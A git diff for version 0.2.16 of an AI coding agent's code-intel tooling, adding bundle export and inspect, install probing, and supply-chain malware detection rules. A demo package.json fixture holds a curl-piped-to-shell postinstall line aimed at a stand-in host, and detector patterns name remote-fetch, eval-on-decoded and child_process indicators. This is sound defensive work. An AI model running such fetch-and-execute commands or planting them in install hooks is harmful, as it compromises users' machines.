22 changes: 22 additions & 0 deletions CHANGELOG.md
@@ -5,6 +5,28 @@ All notable changes to the Attocode Python agent will be documented in this file
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).

## [Unreleased]

## [0.2.16] - 2026-04-05

### Added

#### Code-Intel Install Validation & Bundles
- `attocode code-intel probe-install <target>` — runtime MCP probing for installed file-based assistant configs; resolves `${workspaceFolder}` placeholders, supports local/user scopes, and optionally exercises `project_summary` when the install config pins a project path
- `ResolvedInstallSpec` in `installer.py` plus `resolve_install_spec()` helpers — normalizes installed MCP target configs across JSON/TOML/YAML-backed assistants so install status and probe flows share one source of truth
- `attocode code-intel bundle export` / `bundle inspect` — export portable local code-intel bundles and inspect bundle metadata, artifact presence, sizes, and SHA-256 hashes
- Bundle metadata now records schema version, creation timestamp, project name, bundled artifact inventory, and the shipping `attocode` version for release/debugging workflows
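
The `${workspaceFolder}` resolution described for `probe-install` can be pictured roughly as below. This is a minimal sketch, not the code shipped in `probe.py` or `installer.py`: the helper name `resolve_placeholders`, the `command`/`args` config shape, and the `example-mcp-server` command are assumptions made for illustration.

```python
from pathlib import Path


def resolve_placeholders(spec: dict, project_dir: str) -> dict:
    """Return a copy of an MCP launch spec with ${workspaceFolder} expanded.

    Hypothetical helper: the real ResolvedInstallSpec may be shaped differently.
    """
    root = str(Path(project_dir).resolve())

    def expand(value: str) -> str:
        # Plain string substitution; no shell or environment expansion.
        return value.replace("${workspaceFolder}", root)

    return {
        "command": expand(spec["command"]),
        "args": [expand(arg) for arg in spec.get("args", [])],
    }


# Assumed config shape, as an assistant's MCP config file might store it.
spec = {"command": "example-mcp-server", "args": ["--project", "${workspaceFolder}"]}
resolved = resolve_placeholders(spec, ".")
```

Resolving the placeholder before launching the stdio command means the probe sees the same absolute project path the assistant would pass at runtime.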

#### GlassWorm-Class Supply-Chain Detection
- 7 new anti-pattern rules in `security_scan` targeting stealth supply-chain malware (npm and VS Code Marketplace attacks):
- `invisible_unicode_run` (HIGH, CWE-506) — detects runs of zero-width / variation-selector / tag-character steganographic payloads; scans comment lines since that is a common hiding spot
- `js_eval_on_decoded`, `js_eval_on_buffer`, `js_eval_on_fromcharcode` (CRITICAL, CWE-94) — compound obfuscation patterns where JavaScript runs dynamic code on `atob`/`Buffer.from(..., 'base64')`/`String.fromCharCode` output
- `python_eval_on_b64decode`, `python_exec_on_codecs_decode`, `python_exec_on_marshal_loads` (CRITICAL, CWE-94) — Python equivalents covering base64 decode, codecs/zlib/bytes.fromhex, and marshal.loads
- Additional JavaScript obfuscation heuristics: `js_dynamic_require_concat` for Shai-Hulud-style dynamic `require()` string assembly and `js_settimer_string_arg` for string-based `setTimeout`/`setInterval` execution
- `scan_comments` field on `SecurityPattern` dataclass — allows individual patterns to opt into scanning comment lines (previously all comments were globally skipped)
- Install-hook scanner in `DependencyAuditor._audit_install_hooks` — flags `package.json` `preinstall`/`install`/`postinstall` scripts containing obfuscation or remote-fetch indicators (curl-piped-to-shell, remote scripts, inline `node -e`, `child_process` require, eval/atob/base64)
- Shared `iter_pattern_matches` generator in new `src/attocode/integrations/security/matcher.py` — consolidates comment-skip, language-filter, and per-pattern iteration logic used by both the filesystem scanner and the DB-backed scanner
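
To make the `invisible_unicode_run` idea concrete, here is a small sketch of how runs of invisible characters could be flagged line by line. It is not the shipped rule: the character ranges, the `min_run` threshold of 4, and the function name `find_invisible_runs` are assumptions chosen for illustration.

```python
import re

# Character classes assumed for this sketch; the real rule's set is not shown here.
_INVISIBLE = (
    "\u200b-\u200d"          # zero-width space, non-joiner, joiner
    "\u2060\ufeff"           # word joiner, zero-width no-break space
    "\ufe00-\ufe0f"          # variation selectors 1-16
    "\U000e0100-\U000e01ef"  # variation selectors supplement
    "\U000e0000-\U000e007f"  # tag characters
)


def find_invisible_runs(text: str, min_run: int = 4) -> list[tuple[int, int]]:
    """Return (line_number, run_length) for each run of invisible characters."""
    pattern = re.compile(f"[{_INVISIBLE}]{{{min_run},}}")
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in pattern.finditer(line):
            hits.append((lineno, len(match.group())))
    return hits


# A comment line carrying a five-character invisible payload.
sample = (
    "x = 1\n"
    "// harmless comment" + "\u200b\u200c\u200d\ufe0f\U000e0041" + "\n"
    "console.log(x)\n"
)
print(find_invisible_runs(sample))
```

Requiring a minimum run length keeps a single variation selector after an emoji from being reported, while comment lines are deliberately included because the changelog names them as a common hiding spot.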

## [0.2.15] - 2026-04-04

### Added
2 changes: 1 addition & 1 deletion docs/ast-and-code-intelligence.md
@@ -421,7 +421,7 @@ The MCP server exposes 27 tools across 6 categories:
| Tool | Parameters | Description |
|------|-----------|-------------|
| `semantic_search` | `query`, `top_k`, `file_filter` | Natural language code search (vector + keyword RRF) |
| `security_scan` | `mode`, `path` | Secret detection, anti-patterns, dependency issues |
| `security_scan` | `mode`, `path` | Secret detection, anti-patterns (incl. supply-chain obfuscation), dependency & install-hook issues |

#### LSP

8 changes: 8 additions & 0 deletions docs/roadmap.md
@@ -1,5 +1,13 @@
# Attocode Roadmap

## v0.2.16 -- Install Probing, Portable Bundles & Supply-Chain Hardening (Released 2026-04-05)

1. ~~**Installed-target runtime probing**~~ -- DONE: `attocode code-intel probe-install` validates file-based MCP installs by launching the configured stdio command, resolving `${workspaceFolder}`, and optionally exercising `project_summary`
2. ~~**Portable code-intel bundles**~~ -- DONE: `attocode code-intel bundle export` / `bundle inspect` package local artifacts with metadata, hashes, and version stamping for offline transfer and debugging
3. ~~**Shared install config resolution**~~ -- DONE: `ResolvedInstallSpec` and `resolve_install_spec()` unify JSON/TOML/YAML-backed assistant config parsing for install, status, and probe flows
4. ~~**Supply-chain malware detection expansion**~~ -- DONE: new `security_scan` anti-patterns for invisible Unicode payloads, eval-on-decoded-data obfuscation, dynamic `require()` assembly, and string-based timer execution
5. ~~**Install-hook auditing**~~ -- DONE: dependency audit now flags suspicious `preinstall`/`install`/`postinstall` scripts and shares matcher behavior between local and DB-backed scanners
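
The install-hook audit in item 5 can be sketched as a scan over the lifecycle scripts in `package.json`. This is an illustration under stated assumptions, not `DependencyAuditor._audit_install_hooks` itself: the function name `audit_install_hooks` and the three regular expressions are hypothetical stand-ins for the shipped indicators.

```python
import json
import re

# Lifecycle hooks named in the release notes.
_HOOKS = ("preinstall", "install", "postinstall")

# Illustrative indicators only; the shipped rule set is not reproduced here.
_INDICATORS = {
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash)\b"),
    "inline_node_eval": re.compile(r"\bnode\s+(-e|--eval)\b"),
    "decode_or_eval": re.compile(r"\b(eval|atob)\s*\(|base64"),
}


def audit_install_hooks(package_json_text: str) -> list[tuple[str, str]]:
    """Return (hook_name, indicator_name) pairs for suspicious install scripts."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in _HOOKS:
        command = scripts.get(hook)
        if not isinstance(command, str):
            continue  # hook not defined, or not a plain command string
        for name, pattern in _INDICATORS.items():
            if pattern.search(command):
                findings.append((hook, name))
    return findings


manifest_text = json.dumps({
    "name": "demo",
    "scripts": {
        "postinstall": "curl -s https://example.invalid/x.sh | sh",
        "test": "jest",
    },
})
print(audit_install_hooks(manifest_text))
```

Only the three install-time hooks are inspected, since those run automatically on `npm install`; ordinary scripts such as `test` are left alone.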

## v0.2.6 -- Language Support, Search Quality & Architecture (Released 2026-03-24)

1. ~~**Language-specific symbol extraction**~~ -- DONE: 11 new tree-sitter configs (Erlang, Clojure, Perl, Crystal, Dart, OCaml, F#, Julia, Nim, R, Objective-C); total 36 languages supported
4 changes: 2 additions & 2 deletions pyproject.toml
@@ -4,7 +4,7 @@ build-backend = "hatchling.build"

[project]
name = "attocode"
version = "0.2.15"
version = "0.2.16"
description = "Production AI coding agent"
readme = "README.md"
requires-python = ">=3.12"
@@ -201,7 +201,7 @@ exclude_lines = [
]

[tool.bumpversion]
current_version = "0.2.15"
current_version = "0.2.16"
commit = false
tag = false

2 changes: 1 addition & 1 deletion src/attocode/__init__.py
@@ -1,3 +1,3 @@
"""Attocode - Production AI coding agent."""

__version__ = "0.2.15"
__version__ = "0.2.16"
2 changes: 1 addition & 1 deletion src/attocode/code_intel/GUIDELINES.md
@@ -59,7 +59,7 @@
| Tool | Purpose | When to Use |
|------|---------|-------------|
| `semantic_search` | Natural language code search. Optional `mode`: "auto" (default), "keyword" (fast), "vector" (wait for embeddings) | Find code by description, not name |
| `security_scan` | Secret detection, anti-patterns, dependency issues | Security review |
| `security_scan` | Secret detection (13 patterns), anti-patterns (21 rules incl. supply-chain obfuscation: invisible Unicode, eval-on-decoded-data, install-hook scrutiny), dependency issues | Security review, supply-chain hardening |

### Memory & Recall (50–500 tokens each)

88 changes: 88 additions & 0 deletions src/attocode/code_intel/bundle.py
@@ -0,0 +1,88 @@
"""Portable local artifact bundles for code-intel state."""

from __future__ import annotations

import hashlib
import json
import tarfile
from datetime import UTC, datetime
from pathlib import Path
from tempfile import TemporaryDirectory

from attocode import __version__

_SCHEMA_VERSION = 1
_ARTIFACTS = (
    ("artifacts/index/symbols.db", ".attocode/index/symbols.db"),
    ("artifacts/vectors/embeddings.db", ".attocode/vectors/embeddings.db"),
    ("artifacts/cache/memory.db", ".attocode/cache/memory.db"),
    ("artifacts/adrs.db", ".attocode/adrs.db"),
)


def _sha256(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def _metadata(project_dir: Path) -> dict[str, object]:
    artifacts: list[dict[str, object]] = []
    for bundle_path, rel_path in _ARTIFACTS:
        source = project_dir / rel_path
        present = source.exists()
        artifacts.append({
            "path": bundle_path,
            "present": present,
            "size_bytes": source.stat().st_size if present else 0,
            "sha256": _sha256(source) if present else None,
        })

    return {
        "schema_version": _SCHEMA_VERSION,
        "created_at": datetime.now(UTC).isoformat().replace("+00:00", "Z"),
        "project_name": project_dir.name,
        "project_root_basename": project_dir.name,
        "attocode_version": __version__,
        "artifacts": artifacts,
    }


def export_bundle(project_dir: str, output_path: str) -> Path:
    """Export local code-intel artifacts into a tar.gz bundle."""
    project_root = Path(project_dir).resolve()
    destination = Path(output_path).resolve()
    destination.parent.mkdir(parents=True, exist_ok=True)
    metadata = _metadata(project_root)

    with TemporaryDirectory(prefix="attocode-bundle-") as tmpdir:
        root = Path(tmpdir) / "attocode-bundle"
        root.mkdir(parents=True, exist_ok=True)
        metadata_path = root / "metadata.json"
        metadata_path.write_text(json.dumps(metadata, indent=2) + "\n", encoding="utf-8")

        for bundle_path, rel_path in _ARTIFACTS:
            source = project_root / rel_path
            if not source.exists():
                continue
            target = root / bundle_path
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(source.read_bytes())

        with tarfile.open(destination, "w:gz") as archive:
            archive.add(root, arcname="attocode-bundle")

    return destination


def inspect_bundle(bundle_path: str) -> dict[str, object]:
    """Read bundle metadata without touching local project state."""
    bundle = Path(bundle_path).resolve()
    with tarfile.open(bundle, "r:gz") as archive:
        metadata_member = archive.getmember("attocode-bundle/metadata.json")
        fh = archive.extractfile(metadata_member)
        if fh is None:
            raise FileNotFoundError("metadata.json missing from bundle")
        return json.loads(fh.read().decode("utf-8"))
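
Because the metadata records a SHA-256 per artifact, a receiver can check a transferred bundle against it. The sketch below assumes the archive layout written by `export_bundle` above (`attocode-bundle/metadata.json` plus `attocode-bundle/<artifact path>`); the function name `verify_bundle` is hypothetical and is not part of this PR.

```python
import hashlib
import json
import tarfile


def verify_bundle(bundle_path: str) -> dict[str, bool]:
    """Map each artifact recorded as present to whether its hash matches."""
    results: dict[str, bool] = {}
    with tarfile.open(bundle_path, "r:gz") as archive:
        meta_fh = archive.extractfile("attocode-bundle/metadata.json")
        if meta_fh is None:
            raise FileNotFoundError("metadata.json missing from bundle")
        metadata = json.loads(meta_fh.read().decode("utf-8"))

        for artifact in metadata.get("artifacts", []):
            if not artifact.get("present"):
                continue  # nothing was packed for this entry
            try:
                member_fh = archive.extractfile(f"attocode-bundle/{artifact['path']}")
            except KeyError:
                member_fh = None  # listed in metadata but absent from the archive
            if member_fh is None:
                results[artifact["path"]] = False
                continue
            # Hash in chunks so large databases are not read into memory at once.
            digest = hashlib.sha256()
            for chunk in iter(lambda: member_fh.read(65536), b""):
                digest.update(chunk)
            results[artifact["path"]] = digest.hexdigest() == artifact.get("sha256")
    return results
```

A caller would treat any `False` value as a corrupted or tampered artifact; entries recorded as missing at export time are skipped rather than reported as failures.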
116 changes: 116 additions & 0 deletions src/attocode/code_intel/cli.py
@@ -41,6 +41,8 @@ def dispatch_code_intel(parts: tuple[str, ...] | list[str], *, debug: bool = Fal
        _cmd_serve(args[1:], debug=debug)
    elif cmd == "status":
        _cmd_status()
    elif cmd == "probe-install":
        _cmd_probe_install(args[1:])
    elif cmd == "notify":
        _cmd_notify(args[1:])
    elif cmd == "index":
@@ -69,6 +71,8 @@ def dispatch_code_intel(parts: tuple[str, ...] | list[str], *, debug: bool = Fal
        _cmd_verify(args[1:])
    elif cmd == "reindex":
        _cmd_reindex(args[1:])
    elif cmd == "bundle":
        _cmd_bundle(args[1:])
    else:
        print(f"Unknown code-intel command: {cmd}", file=sys.stderr)
        _print_help()
@@ -86,6 +90,7 @@ def _print_help() -> None:
        " serve Run MCP server directly (stdio or SSE)\n"
        " index Build or check embedding index for semantic search\n"
        " status Check installation status across all targets\n"
        " probe-install Run a runtime MCP probe for an installed target\n"
        " notify Notify server about changed files (for hooks)\n"
        " test-connection Verify connectivity to the remote server\n"
        " watch Watch filesystem for changes and notify remote server\n"
@@ -99,6 +104,8 @@ def _print_help() -> None:
        " deps <file> Show file dependencies and dependents\n"
        "\n"
        "Maintenance commands:\n"
        " bundle export Export local code-intel artifacts into a bundle\n"
        " bundle inspect Inspect bundle metadata and artifacts\n"
        " gc Run garbage collection (orphaned embeddings + content)\n"
        " verify Run integrity checks on the index\n"
        " reindex Force a full reindex of the project\n"
@@ -134,6 +141,11 @@ def _print_help() -> None:
        " --global Install globally (Claude, Codex, Zed, Gemini, Junie, Amp)\n"
        " --hooks Also install PostToolUse hooks (Claude Code)\n"
        "\n"
        "Probe options:\n"
        " probe-install <t> Probe an installed file-based target by launching MCP stdio\n"
        " --project <path> Project directory to substitute for ${workspaceFolder}\n"
        " --global Read the user/global config when the target supports it\n"
        "\n"
        "Serve options:\n"
        " --transport <type> Transport protocol: stdio (default), sse, or http\n"
        " --host <addr> Server host address (default: 127.0.0.1)\n"
@@ -167,6 +179,10 @@ def _print_help() -> None:
        " --top <N> Number of results (query: default 10, hotspots: default 15)\n"
        " --filter <glob> File filter glob for semantic search (e.g. '*.py')\n"
        " --search <name> Search for symbol by name (symbols command)\n"
        "\n"
        "Bundle options:\n"
        " bundle export [--project <path>] [--output <bundle.tar.gz>]\n"
        " bundle inspect <bundle.tar.gz>\n"
    )


@@ -205,6 +221,10 @@ def _parse_opts(args: list[str]) -> tuple[str | None, str, str, bool]:
    return target, project_dir, scope, hooks


def _args_include_project_flag(args: list[str]) -> bool:
    return any(arg == "--project" or arg.startswith("--project=") for arg in args)


def _cmd_install(args: list[str]) -> None:
    from attocode.code_intel.installer import ALL_TARGETS_STR, install, install_hooks

@@ -507,6 +527,102 @@ def _cmd_status() -> None:
print(f" Entry point: {resolved}")


def _cmd_probe_install(args: list[str]) -> None:
    """Run a runtime MCP probe for a file-based installed target."""
    from attocode.code_intel.installer import ALL_TARGETS_STR
    from attocode.code_intel.probe import probe_install

    target, project_dir, scope, _hooks = _parse_opts(args)
    if not target:
        print(f"Error: specify a target ({ALL_TARGETS_STR})", file=sys.stderr)
        sys.exit(1)

    exit_code = probe_install(
        target,
        project_dir=project_dir,
        scope=scope,
        force_project_probe=_args_include_project_flag(args),
    )
    if exit_code:
        sys.exit(exit_code)


def _cmd_bundle(args: list[str]) -> None:
    """Export or inspect local code-intel bundles."""
    if not args or args[0] in {"-h", "--help", "help"}:
        print(
            "Usage:\n"
            " attocode code-intel bundle export [--project <path>] [--output <bundle.tar.gz>]\n"
            " attocode code-intel bundle inspect <bundle.tar.gz>\n"
        )
        return

    subcmd = args[0]
    if subcmd == "export":
        from attocode.code_intel.bundle import export_bundle

        _, project_dir, _, _ = _parse_opts(args[1:])
        output_path = ""
        tail = args[1:]
        i = 0
        while i < len(tail):
            arg = tail[i]
            if arg == "--output" and i + 1 < len(tail):
                output_path = tail[i + 1]
                i += 2
            elif arg.startswith("--output="):
                output_path = arg.split("=", 1)[1]
                i += 1
            else:
                i += 1

        if not output_path:
            bundle_name = f"attocode-bundle-{os.path.basename(os.path.abspath(project_dir))}.tar.gz"
            output_path = os.path.join(os.getcwd(), bundle_name)

        destination = export_bundle(project_dir, output_path)
        print(f"Bundle exported to {destination}")
        return

    if subcmd == "inspect":
        import json as json_mod
        import tarfile

        from attocode.code_intel.bundle import inspect_bundle

        bundle_path = ""
        for arg in args[1:]:
            if not arg.startswith("-"):
                bundle_path = arg
                break
        if not bundle_path:
            print("Error: specify a bundle path.", file=sys.stderr)
            sys.exit(1)

        try:
            metadata = inspect_bundle(bundle_path)
        except (FileNotFoundError, OSError, tarfile.TarError, KeyError, json_mod.JSONDecodeError) as exc:
            print(f"Error: could not inspect bundle: {exc}", file=sys.stderr)
            sys.exit(1)
        print(f"Bundle: {os.path.abspath(bundle_path)}")
        print(f" Schema version: {metadata.get('schema_version')}")
        print(f" Created at: {metadata.get('created_at')}")
        print(f" Project: {metadata.get('project_name')}")
        print(f" Attocode version: {metadata.get('attocode_version')}")
        print(" Artifacts:")
        for artifact in metadata.get("artifacts", []):
            status = "present" if artifact.get("present") else "missing"
            print(
                " "
                f"{artifact.get('path')}: {status}, "
                f"size={artifact.get('size_bytes')}, sha256={artifact.get('sha256')}"
            )
        return

    print(f"Error: unknown bundle command '{subcmd}'", file=sys.stderr)
    sys.exit(1)


def _cmd_notify(args: list[str]) -> None:
    """Notify the server about changed files via the notification queue.
